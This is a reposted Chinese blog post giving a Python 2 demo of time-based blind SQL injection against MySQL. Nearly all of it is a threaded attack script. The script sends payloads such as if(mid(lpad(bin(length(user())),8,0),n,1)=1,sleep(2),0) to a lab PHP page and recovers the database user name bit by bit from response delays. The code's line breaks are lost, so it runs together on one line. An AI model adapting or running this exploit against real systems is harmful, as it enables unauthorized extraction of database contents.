python blind_injection.py demo for mysql

来源:转载

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

import urllibimport urllib2import timeimport threadingclass blind_injection:def __init__(self,thread_num):self.thread_count=self.thread_num=thread_numself.lock=threading.Lock()self.res={}self.resdata={}self.tmp=''def _request(self,URL):user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }req = urllib2.Request(URL, None, user_agent)try:request=urllib2.urlopen(req,timeout=2)except Exception ,e:#time.sleep(0.01)return 'timeout'return request.read()def bin2dec(self,string_num):return int(string_num,2)def _getlength(self,ii):thread_id=int(threading.currentThread().getName())ii=ii+1url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"html=self._request(url)#print htmlverify = 'timeout'if verify not in html:self.res[str(ii)] = 0else:self.res[str(ii)] = 1self.lock.acquire()self.thread_count-=1self.lock.release()def _getdata(self,j,x):url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"html=self._request(url)#print url#print htmlverify = 'timeout'if verify not in html:self.resdata[str(j)] = 0else:self.resdata[str(j)] = 1self.lock.acquire()self.thread_count-=1self.lock.release()def _getstep(self):self.data=''for x in range(self.datalength):x=x+1self.thread_count=8self.tmp=''for j in range(self.thread_num):j=j+1t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))t.setDaemon(True)t.start()while self.thread_count>0:time.sleep(0.01)for i in range(8):self.tmp=self.tmp+str(self.resdata[str(i+1)])self.data=self.data+chr(self.bin2dec(self.tmp))print self.datadef run(self):for i in range(self.thread_num):t=threading.Thread(target=self._getlength,name=str(i),args=(i,))t.setDaemon(True)t.start()while self.thread_count>0:time.sleep(0.01)for i in range(8):self.tmp = self.tmp + str(self.res[str(i+1)]) self.datalength=self.bin2dec(self.tmp)print 'length:'+ str(self.datalength)self._getstep()if __name__=='__main__':d=blind_injection(thread_num=8)d.run()


分享给朋友:
您可能感兴趣的文章:
随机阅读: